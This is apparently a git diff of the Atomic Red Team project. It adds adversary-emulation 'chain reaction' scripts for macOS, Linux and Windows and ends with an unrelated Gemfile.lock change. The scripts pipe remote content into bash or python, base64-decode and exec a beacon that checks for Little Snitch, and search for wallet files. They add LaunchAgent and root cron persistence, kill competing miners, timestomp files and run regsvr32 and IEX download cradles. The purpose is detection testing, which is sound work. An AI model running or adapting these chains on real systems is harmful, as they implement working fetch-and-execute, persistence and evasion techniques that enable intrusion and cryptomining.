curl --silent https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-stage-02.py || wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-stage-02.py | python - ``
# Tactic: Discovery
# Technique: T1083 - File and Directory Discovery
find ~ -name "*wallet*" > interestingfiles.txt
cp interestingfiles.txt ${OUTPUT}/interestingfiles.txt
# Tactic: Persistence
# Technique: T1159 - Launch Agent
mkdir -p ~/Library/LaunchAgents
cd ~/Library/LaunchAgents
curl --silent -o com.apple.rig2.plist https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-payload-launchagent.plist
curl --silent -o com.proxy.initialize.plist https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-backdoor-launchagent.plist
launchctl load -w com.apple.rig2.plist
launchctl load -w com.proxy.initialize.plist
cd /Users/Shared
curl --silent -o xmrig2 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello.macos
# Tactic: Defense Evasion
# Technique: T1222 - File Permissions Modification
chmod +x ./xmrig2
./xmrig2
ARTifacts/Chain_Reactions/cookie-miner-stage-02.py
+25
View File
@@ -0,0 +1,25 @@
# import sys;import re, subprocess;cmd = "ps -ef | grep Little\ Snitch | grep -v grep"
# ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
# out = ps.stdout.read()
# ps.stdout.close()
# if re.search("Little Snitch", out):
# sys.exit()
# import urllib2;
# UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';server='http://atomicredteam.io';t='/news.php';req=urllib2.Request(server+t);
# req.add_header('User-Agent',UA);
# req.add_header('Cookie',"session=BmHiW7UA/sf9C279oE2owK9LZ0c=");
# proxy = urllib2.ProxyHandler();
# o = urllib2.build_opener(proxy);
# urllib2.install_opener(o);
# a=urllib2.urlopen(req).read();
# Tactic: Defense Evasion
# Technique: T1140 - Deobfuscate/Decode Files or Information
#
# Tactic: Discovery
# Technique: T1057 - Process Discovery
#
# Tactic: Command and Control
# Technique: T1043 - Commonly Used Port
#
import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly9hdG9taWNyZWR0ZWFtLmlvJzt0PScvbmV3cy5waHAnO3JlcT11cmxsaWIyLlJlcXVlc3Qoc2VydmVyK3QpOwpyZXEuYWRkX2hlYWRlcignVXNlci1BZ2VudCcsVUEpOwpyZXEuYWRkX2hlYWRlcignQ29va2llJywic2Vzc2lvbj1CbUhpVzdVQS9zZjlDMjc5b0Uyb3dLOUxaMGM9Iik7CnByb3h5ID0gdXJsbGliMi5Qcm94eUhhbmRsZXIoKTsKbyA9IHVybGxpYjIuYnVpbGRfb3BlbmVyKHByb3h5KTsKdXJsbGliMi5pbnN0YWxsX29wZW5lcihvKTsKYT11cmxsaWIyLnVybG9wZW4ocmVxKS5yZWFkKCk7'))
ARTifacts/Chain_Reactions/mirai-reaction-stage-01.sh
Executable
+17
View File
@@ -0,0 +1,17 @@
#! /bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
# Tactic: Discovery
# Technique: T1082 - System Information discovery
MIRAI_EXT=`uname -m`
wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello -O mirai.$MIRAI_EXT
# Tactic: Defense Evasion
# Technique: T1222 - File Permissions Modification
chmod +x mirai.$MIRAI_EXT
./mirai.$MIRAI_EXT
# Tactic: Defense Evasion
# Technique: T1107 - File Deletion
rm -rf mirai.$MIRAI_EXT
ARTifacts/Chain_Reactions/rocke-and-roll-stage-01.sh
+10
View File
@@ -0,0 +1,10 @@
#! /bin/bash
# Tactic: Defense Evasion
# Technique: T1027 - Obfuscated Files or Information
bash -c "(curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-base64.sh || wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-base64.sh)|base64 -d |/bin/bash"
# If you want to skip the base64 process, uncommend the following line:
# bash -c "(curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh || wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh)|/bin/bash"
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 01" >> /tmp/atomic.log
ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-base64.sh
+81
View File
@@ -0,0 +1,81 @@
IyEgL2Jpbi9iYXNoCgpmdW5jdGlvbiBjKCkgewpwa2lsbCAtZiBzb3VycGx1bQpwa2lsbCAtZiB4
bXJpZwpwa2lsbCAtZiBjcnlwdG9uaWdodApwa2lsbCAtZiBzdHJhdHVtCnBraWxsIC1mIG1peG5l
cmR4CnBraWxsIC1mIG1pbmV4bXIKcGtpbGwgLWYgbWluZXJkCnBraWxsIC1mIG1pbmVyZ2F0ZQpw
a2lsbCAtZiBrd29ya2VyMzQKcGtpbGwgLWYgWGJhc2gKCiMgICBUYWN0aWM6IERlZmVuc2UgRXZh
c2lvbgojICAgVGVjaG5pcXVlOiBUMTIyMiAtIEZpbGUgUGVybWlzc2lvbiBNb2RpZmljYXRpb24K
Y2hhdHRyIC1pIC90bXAva3dvcmtlcmRzIC92YXIvdG1wL2t3b3JrZXJkcwoKIyAgIFRhY3RpYzog
RGVmZW5zZSBFdmFzaW9uCiMgICBUZWNobmlxdWU6IFQxMTA3IC0gRmlsZSBEZWxldGlvbgpybSAt
cmYgL3RtcC9rd29ya2VyZHMgL3Zhci90bXAva3dvcmtlcmRzCgojICAgVGFjdGljOiBEaXNjb3Zl
cnkKIyAgIFRlY2huaXF1ZTogVDEwNTcgLSBQcm9jZXNzIERpc2NvdmVyeQpwcyBhdXhmfGdyZXAg
LXYgZ3JlcHxncmVwIC12ICJcXyIgfGdyZXAgLXYgImt0aHJlYWRkIiB8Z3JlcCAiXFsuKlxdInxh
d2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkgPi9kZXYvbnVsbCAyPiYxCnBzIGF1eGZ8Z3Jl
cCAtdiBncmVwfGdyZXAgInhtcmlnIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOSA+
L2Rldi9udWxsIDI+JjEKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAiWGJhc2giIHwgYXdrICd7
cHJpbnQgJDJ9J3x4YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpwcyBhdXhmfGdyZXAgLXYg
Z3JlcHxncmVwICJzdHJhdHVtIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOSA+L2Rl
di9udWxsIDI+JjEKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAieG1yIiB8IGF3ayAne3ByaW50
ICQyfSd8eGFyZ3Mga2lsbCAtOSA+L2Rldi9udWxsIDI+JjEKcHMgYXV4ZnxncmVwIC12IGdyZXB8
Z3JlcCAibWluZXJkIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOSA+L2Rldi9udWxs
IDI+JjEKCiMgICBUYWN0aWM6IERpc2NvdmVyeQojICAgVGVjaG5pcXVlOiBUMTA0OSAtIFN5c3Rl
bSBOZXR3b3JrIENvbm5lY3Rpb25zIERpc2NvdmVyeQpuZXRzdGF0IC1hbnAgfCBncmVwIDozMzMz
IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxs
IC05ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDo0NDQ0IHxhd2sgJ3twcmlu
dCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05ID4vZGV2L251
bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDo1NTU1IHxhd2sgJ3twcmludCAkN30nfCBhd2sg
LUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpuZXRz
dGF0IC1hbnAgfCBncmVwIDo2NjY2IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3By
aW50ICQxfScgfCB4YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBn
cmVwIDo3Nzc3IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4
YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDozMzQ3IHxh
d2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05
ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDoxNDQ0NCB8YXdrICd7cHJpbnQg
JDd9J3wgYXdrIC1GJ1svXScgJ3twcmludCAkMX0nIHwgeGFyZ3Mga2lsbCAtOSA+L2Rldi9udWxs
IDI+JjEKbmV0c3RhdCAtYW5wIHwgZ3JlcCA6MTQ0MzMgfGF3ayAne3ByaW50ICQ3fSd8IGF3ayAt
RidbL10nICd7cHJpbnQgJDF9JyB8IHhhcmdzIGtpbGwgLTkgPi9kZXYvbnVsbCAyPiYxCgplY2hv
ICQoZGF0ZSAtdSkgIkV4ZWN1dGVkIEF0b21pYyBSZWQgVGVhbSBSb2NrZSBhbmQgUm9sbCwgU3Rh
Z2UgMDIsIHBhcnQgQyIgPj4gL3RtcC9hdG9taWMubG9nCn0KCmZ1bmN0aW9uIGIoKSB7CiAgICBt
a2RpciAtcCAvdmFyL3RtcAoKICAgICMgICBUYWN0aWM6IERlZmVuc2UgRXZhc2lvbgogICAgIyAg
IFRlY2huaXF1ZTogVDEyMjIgLSBGaWxlIFBlcm1pc3Npb24gTW9kaWZpY2F0aW9uCiAgICBjaG1v
ZCAxNzc3IC92YXIvdG1wCgogICAgIyAgIFRhY3RpYzogRGVmZW5zZSBFdmFzaW9uCiAgICAjICAg
VGVjaG5pcXVlOiBUMTAzNiAtIE1hc3F1ZXJhZGluZwogICAgKGN1cmwgLWZzU0wgLS1jb25uZWN0
LXRpbWVvdXQgMTIwIGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yZWRjYW5hcnlj
by9hdG9taWMtcmVkLXRlYW0vbWFzdGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFjdGlvbnMvYXRvbWlj
LWhlbGxvIC1vIC92YXIvdG1wL2t3b3JrZXJkc3x8d2dldCBodHRwczovL3Jhdy5naXRodWJ1c2Vy
Y29udGVudC5jb20vcmVkY2FuYXJ5Y28vYXRvbWljLXJlZC10ZWFtL21hc3Rlci9BUlRpZmFjdHMv
Q2hhaW5fUmVhY3Rpb25zL2F0b21pYy1oZWxsbyAtTyAvdmFyL3RtcC9rd29ya2VyZHMpICYmIGNo
bW9kICt4IC92YXIvdG1wL2t3b3JrZXJkcwogICAgbm9odXAgL3Zhci90bXAva3dvcmtlcmRzID4v
ZGV2L251bGwgMj4mMSAmCgogICAgZWNobyAkKGRhdGUgLXUpICJFeGVjdXRlZCBBdG9taWMgUmVk
IFRlYW0gUm9ja2UgYW5kIFJvbGwsIFN0YWdlIDAyLCBwYXJ0IEIiID4+IC90bXAvYXRvbWljLmxv
Zwp9CgpmdW5jdGlvbiBhKCkgewoKICAgICMgICBUYWN0aWM6IERlZmVuc2UgRXZhc2lvbgogICAg
IyAgIFRlY2huaXF1ZTogVDEyMjIgLSBGaWxlIFBlcm1pc3Npb24gTW9kaWZpY2F0aW9uCgljaGF0
dHIgLWkgL2V0Yy9jcm9uLmQvcm9vdCAvdmFyL3Nwb29sL2Nyb24vcm9vdCAvdmFyL3Nwb29sL2Ny
b24vY3JvbnRhYnMvcm9vdAoKICAgICMgICBUYWN0aWM6IFBlcnNpc3RlbmNlCiAgICAjICAgVGVj
aG5pcXVlOiBUMTE2OCAtIExvY2FsIEpvYiBTY2hlZHVsaW5nCgllY2hvIC1lICIqLzEwICogKiAq
ICogcm9vdCAoY3VybCAtZnNTTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcmVk
Y2FuYXJ5Y28vYXRvbWljLXJlZC10ZWFtL21hc3Rlci9BUlRpZmFjdHMvQ2hhaW5fUmVhY3Rpb25z
L3JvY2tlLWFuZC1yb2xsLXN0YWdlLTAyLWRlY29kZWQuc2h8fHdnZXQgLXEgLU8tIGh0dHBzOi8v
cmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yZWRjYW5hcnljby9hdG9taWMtcmVkLXRlYW0vbWFz
dGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFjdGlvbnMvcm9ja2UtYW5kLXJvbGwtc3RhZ2UtMDItZGVj
b2RlZC5zaCl8c2hcbiMjIiA+IC9ldGMvY3Jvbi5kL3Jvb3QKCW1rZGlyIC1wIC92YXIvc3Bvb2wv
Y3Jvbi9jcm9udGFicwoJZWNobyAtZSAiKi8zMSAqICogKiAqIChjdXJsIC1mc1NMIGh0dHBzOi8v
cmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yZWRjYW5hcnljby9hdG9taWMtcmVkLXRlYW0vbWFz
dGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFjdGlvbnMvcm9ja2UtYW5kLXJvbGwtc3RhZ2UtMDItZGVj
b2RlZC5zaHx8d2dldCAtcSAtTy0gaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3Jl
ZGNhbmFyeWNvL2F0b21pYy1yZWQtdGVhbS9tYXN0ZXIvQVJUaWZhY3RzL0NoYWluX1JlYWN0aW9u
cy9yb2NrZS1hbmQtcm9sbC1zdGFnZS0wMi1kZWNvZGVkLnNoKXxzaFxuIyMiID4gL3Zhci9zcG9v
bC9jcm9uL2Nyb250YWJzL3Jvb3QKCW1rZGlyIC1wIC9ldGMvY3Jvbi5kYWlseQoJKGN1cmwgLWZz
U0wgLS1jb25uZWN0LXRpbWVvdXQgMTIwIGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNv
bS9yZWRjYW5hcnljby9hdG9taWMtcmVkLXRlYW0vbWFzdGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFj
dGlvbnMvcm9ja2UtYW5kLXJvbGwtc3RhZ2UtMDItZGVjb2RlZC5zaCAtbyAvZXRjL2Nyb24uZGFp
bHkvb2FuYWNyb25lcnx8d2dldCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcmVk
Y2FuYXJ5Y28vYXRvbWljLXJlZC10ZWFtL21hc3Rlci9BUlRpZmFjdHMvQ2hhaW5fUmVhY3Rpb25z
L3JvY2tlLWFuZC1yb2xsLXN0YWdlLTAyLWRlY29kZWQuc2ggLU8gL2V0Yy9jcm9uLmRhaWx5L29h
bmFjcm9uZXIpCgogICAgIyAgIFRhY3RpYzogRGVmZW5zZSBFdmFzaW9uCiAgICAjICAgVGVjaG5p
cXVlOiBUMTIyMiAtIEZpbGUgUGVybWlzc2lvbiBNb2RpZmljYXRpb24KICAgIGNobW9kIDc1NSAv
ZXRjL2Nyb24uZGFpbHkvb2FuYWNyb25lcgoKICAgICMgICBUYWN0aWM6IERlZmVuc2UgRXZhc2lv
bgogICAgIyAgIFRlY2huaXF1ZTogVDEwOTkgLSBUaW1lc3RvbXAKCXRvdWNoIC1hY21yIC9iaW4v
c2ggL2V0Yy9jcm9uLmRhaWx5L29hbmFjcm9uZXIKICAgIHRvdWNoIC1hY21yIC9iaW4vc2ggL2V0
Yy9jcm9uLmQvcm9vdAogICAgdG91Y2ggLWFjbXIgL2Jpbi9zaCAvdmFyL3Nwb29sL2Nyb24vY3Jv
bnRhYnMvcm9vdAoKICAgIGVjaG8gJChkYXRlIC11KSAiRXhlY3V0ZWQgQXRvbWljIFJlZCBUZWFt
IFJvY2tlIGFuZCBSb2xsLCBTdGFnZSAwMiwgcGFydCBBIiA+PiAvdG1wL2F0b21pYy5sb2cKfQoK
YQpiCmM=
ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh
+90
View File
@@ -0,0 +1,90 @@
#! /bin/bash
function c() {
pkill -f sourplum
pkill -f xmrig
pkill -f cryptonight
pkill -f stratum
pkill -f mixnerdx
pkill -f minexmr
pkill -f minerd
pkill -f minergate
pkill -f kworker34
pkill -f Xbash
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
chattr -i /tmp/kworkerds /var/tmp/kworkerds
# Tactic: Defense Evasion
# Technique: T1107 - File Deletion
rm -rf /tmp/kworkerds /var/tmp/kworkerds
# Tactic: Discovery
# Technique: T1057 - Process Discovery
ps auxf|grep -v grep|grep -v "\_" |grep -v "kthreadd" |grep "\[.*\]"|awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "xmrig" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "Xbash" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "stratum" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "xmr" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "minerd" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
# Tactic: Discovery
# Technique: T1049 - System Network Connections Discovery
netstat -anp | grep :3333 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :4444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :5555 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :6666 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :7777 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :3347 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :14444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :14433 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 02, part C" >> /tmp/atomic.log
}
function b() {
mkdir -p /var/tmp
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
chmod 1777 /var/tmp
# Tactic: Defense Evasion
# Technique: T1036 - Masquerading
(curl -fsSL --connect-timeout 120 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello -o /var/tmp/kworkerds||wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello -O /var/tmp/kworkerds) && chmod +x /var/tmp/kworkerds
nohup /var/tmp/kworkerds >/dev/null 2>&1 &
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 02, part B" >> /tmp/atomic.log
}
function a() {
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
chattr -i /etc/cron.d/root /var/spool/cron/root /var/spool/cron/crontabs/root
# Tactic: Persistence
# Technique: T1168 - Local Job Scheduling
echo -e "*/10 * * * * root (curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh||wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh)|sh\n##" > /etc/cron.d/root
mkdir -p /var/spool/cron/crontabs
echo -e "*/31 * * * * (curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh||wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh)|sh\n##" > /var/spool/cron/crontabs/root
mkdir -p /etc/cron.daily
(curl -fsSL --connect-timeout 120 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh -o /etc/cron.daily/oanacroner||wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh -O /etc/cron.daily/oanacroner)
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
chmod 755 /etc/cron.daily/oanacroner
# Tactic: Defense Evasion
# Technique: T1099 - Timestomp
touch -acmr /bin/sh /etc/cron.daily/oanacroner
touch -acmr /bin/sh /etc/cron.d/root
touch -acmr /bin/sh /var/spool/cron/crontabs/root
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 02, part A" >> /tmp/atomic.log
}
a
b
c
ARTifacts/Labs/Webinar11062017-Labs.bat
+36
View File
@@ -0,0 +1,36 @@
:: Basic Test Lab One
:: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct
::
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll
:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
:: NOTE We recommend executing from a server that you control.
:: NOTE Thank You :)
:: Lab Two
:: Chain Reactions - Chaining Multiple ATOMIC Test
:: Lets have some fun shall we ;-)
:: Techniques rarely occur in isolation
:: In the Attack Lets combine 3 Techniques
:: You can customize tests
:: Step 1. A payload executes Regsvr32.exe as seen in Lab One T1117
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll
:: Step 2. This payload will execute an discovery sequence T1087
:: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat
:: Alternate Endings ;-) => powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')"
net user Administrator /domain & net Accounts & net localgroup administrators & net use & net share & net group "domain admins" /domain & net config workstation & net accounts & net accounts /domain & net view & reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices & reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify & reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit & reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell & reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell & reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run & wmic useraccount list & wmic useraccount get /ALL & wmic startup list brief & wmic share list & wmic service get name,displayname,pathname,startmode & wmic process list brief & wmic process get caption,executablepath,commandline & wmic qfe get description,installedOn /format:csv & arp -a & "cmd.exe" /C whoami & ipconfig /displaydns & route print & netsh advfirewall show allprofiles & systeminfo & qwinsta & quser
:: Step 3. We will setup some persistence by creating a scheduled task. T1053
:: Alternate Ending : SCHTASKS /Create /SC ONCE /TN spawn /TR "regsvr32.exe /s /u /i:https://example.com/a.sct scrobj.dll" /ST 20:10
SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10
:: We will also just go ahead and clean up the task.
SCHTASKS /Delete /TN Spawn /F
atomics/T1074.001/src/Discovery.bat → ARTifacts/Misc/Discovery.bat
+5 -5
View File
@@ -8,16 +8,16 @@ net config workstation
net accounts
net accounts /domain
net view
sc.exe query
sc query
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"
reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell"
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell"
reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
ARTifacts/Misc/flag.txt
+1
View File
@@ -0,0 +1 @@
Downloaded Remote Content
Gemfile.lock
+112 -127
View File
@@ -6,14 +6,13 @@ PATH
GEM
remote: https://rubygems.org/
specs:
activesupport (6.0.3.4)
concurrent-ruby (~> 1.0, >= 1.0.2)
i18n (>= 0.7, < 2)
activesupport (4.2.10)
i18n (~> 0.7)
minitest (~> 5.1)
thread_safe (~> 0.3, >= 0.3.4)
tzinfo (~> 1.1)
zeitwerk (~> 2.2, >= 2.2.2)
addressable (2.8.0)
public_suffix (>= 2.0.2, < 5.0)
addressable (2.5.2)
public_suffix (>= 2.0.2, < 4.0)
coffee-script (2.4.1)
coffee-script-source
execjs
@@ -21,136 +20,134 @@ GEM
colorator (1.1.0)
commonmarker (0.17.13)
ruby-enum (~> 0.5)
concurrent-ruby (1.1.7)
dnsruby (1.61.5)
simpleidn (~> 0.1)
em-websocket (0.5.2)
concurrent-ruby (1.1.4)
dnsruby (1.61.2)
addressable (~> 2.5)
em-websocket (0.5.1)
eventmachine (>= 0.12.9)
http_parser.rb (~> 0.6.0)
ethon (0.12.0)
ffi (>= 1.3.0)
eventmachine (1.2.7)
execjs (2.7.0)
faraday (1.1.0)
faraday (0.15.4)
multipart-post (>= 1.2, < 3)
ruby2_keywords
ffi (1.13.1)
ffi (1.10.0)
forwardable-extended (2.6.0)
gemoji (3.0.1)
github-pages (209)
github-pages-health-check (= 1.16.1)
jekyll (= 3.9.0)
jekyll-avatar (= 0.7.0)
gemoji (3.0.0)
github-pages (193)
activesupport (= 4.2.10)
github-pages-health-check (= 1.8.1)
jekyll (= 3.7.4)
jekyll-avatar (= 0.6.0)
jekyll-coffeescript (= 1.1.1)
jekyll-commonmark-ghpages (= 0.1.6)
jekyll-commonmark-ghpages (= 0.1.5)
jekyll-default-layout (= 0.1.4)
jekyll-feed (= 0.15.1)
jekyll-feed (= 0.11.0)
jekyll-gist (= 1.5.0)
jekyll-github-metadata (= 2.13.0)
jekyll-mentions (= 1.6.0)
jekyll-optional-front-matter (= 0.3.2)
jekyll-github-metadata (= 2.9.4)
jekyll-mentions (= 1.4.1)
jekyll-optional-front-matter (= 0.3.0)
jekyll-paginate (= 1.1.0)
jekyll-readme-index (= 0.3.0)
jekyll-redirect-from (= 0.16.0)
jekyll-relative-links (= 0.6.1)
jekyll-remote-theme (= 0.4.2)
jekyll-readme-index (= 0.2.0)
jekyll-redirect-from (= 0.14.0)
